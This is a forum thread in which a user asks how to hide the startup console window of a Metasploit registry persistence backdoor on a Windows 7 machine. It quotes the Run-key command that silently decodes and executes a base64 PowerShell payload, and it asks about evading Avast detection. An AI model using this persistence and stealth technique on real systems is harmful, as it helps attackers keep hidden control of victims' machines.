Jump to content

Metasploit Persistence - Can't hide CMD prompt on startup


Vurraz

Recommended Posts

Hello,

I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine.

I wish to completely hide that shell on startup, to make the backdoor stealthy.

 

I tried tinkering with the options in the registry key, but it didn't help. 

This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run)

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))"

I'm testing this on Windows 7 Enterprise.

Link to comment
Share on other sites

The problem with most windows backdoors (including reverse shells) is that they need the window open to function. Your best bet is going to be to try and hide that window, so I've linked some stackexchange answers that explain how to do exactly that below. Most of these involve making the script into a vbs object, which by default run in the background on windows systems. 

Answer #1

Answer #2

Link to comment
Share on other sites

Thank you so much. This worked. No windows is seen. I'm so grateful.

 

I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...).

But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the vicitm PC to make this work... Is this going to trigger the antivirus?  What about Avast?

Do you have a cleaner solution in mind, instead of uploading 2 files to the victim?

Is it possible to write the .vbs and .bat source code DIRECTLY into the registery key, so that no file needs to be uploaded? If so, please show me how.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...